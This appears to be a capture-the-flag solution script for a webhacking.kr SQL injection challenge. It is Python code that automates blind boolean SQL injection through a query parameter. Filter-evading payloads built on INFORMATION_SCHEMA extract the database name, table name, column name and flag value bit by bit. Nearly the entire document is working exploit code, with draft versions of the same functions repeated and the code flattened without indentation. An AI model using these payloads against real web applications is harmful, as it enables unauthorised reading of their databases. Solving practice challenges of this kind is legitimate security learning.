OLD-13

def length_finder(search_max): for i in range(1,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=(0)or((length(database()))in("+str(i)+"))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text)

def word_finder(length): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr(database(),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n",flag)

def length_finder(search_max): for i in range(10,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))IN("+str(i)+")" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text) exit() print("LENGTH NOT FOUND") exit() def word_finder(length): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n","STRING VALUE : "+flag)

import requests import os os.system("cls") print("------------AUTO EXPLOIT------------") URL = "https://webhacking.kr/challenge/web-10/" cookie = {"PHPSESSID": "<--REDACTED-->"} true= "result</td></tr><tr><td>1</td>" false ="result</td></tr><tr><td>0</td>" DBNAME_query = "database()" TABLENAME_query = "(SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN("+DBNAME_query+")),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES))" COLUMNNAME_query = "(SELECT(MIN(IF((SELECT(TABLE_NAME)IN("+TABLENAME_query+")),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS))" DATA_query = "(SELECT(MIN(flag_3a55b31d))FROM(flag_ab733768))" def length_finder(search_max,query): for i in range(1,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=LENGTH("+query+")IN("+str(i)+")" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text) exit() print("LENGTH NOT FOUND") exit() def word_finder(length,query): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr("+query+","+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n","STRING VALUE : "+flag) if __name__ == "__main__": #word_finder(length_finder(20,DBNAME_query),DBNAME_query) #word_finder(length_finder(20,TABLENAME_query),TABLENAME_query) #word_finder(length_finder(20,COLUMNNAME_query),COLUMNNAME_query) word_finder(length_finder(30,DATA_query),DATA_query)